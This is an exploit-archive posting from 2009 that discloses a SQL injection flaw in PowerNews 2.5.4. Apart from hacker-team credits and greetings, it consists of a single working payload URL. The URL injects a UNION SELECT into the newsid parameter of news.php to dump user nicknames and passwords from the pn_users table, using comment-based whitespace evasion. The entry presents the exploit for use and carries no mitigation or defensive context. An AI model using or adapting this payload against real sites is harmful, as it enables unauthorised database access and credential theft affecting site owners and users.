[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : PowerNews 2.5.4 (news.php newsid) SQL Injection Vulnerability
# Published : 2009-01-01
# Author : Virangar Security
# Previous Title : w3blabor CMS <= 3.3.0 (Admin Bypass) SQL Injection Vulnerability
# Next Title : PowerClan 1.14a (Auth Bypass) SQL Injection Vulnerability
#######################################################################################
# #
# ...:::::powernews 2.5.4 SQL Injection Vulnerability::::.... #
#######################################################################################
Virangar Security Team
www.virangar.net
--------
Discoverd By :virangar security team(hadihadi)
special tnx to:MR.nosrati,black.shadowes,MR.hesy,Ali007,Zahra
& all virangar members & all hackerz
greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal)
-------
exploit:
http://site.com/news.php?newsid='/**/union/**/select/**/1,2,3,4,concat(nickname,0x3e,password),6,7,8,9/**/from/**/pn_users/*
----
young iranian h4ck3rz
# www.Syue.com [2009-01-01]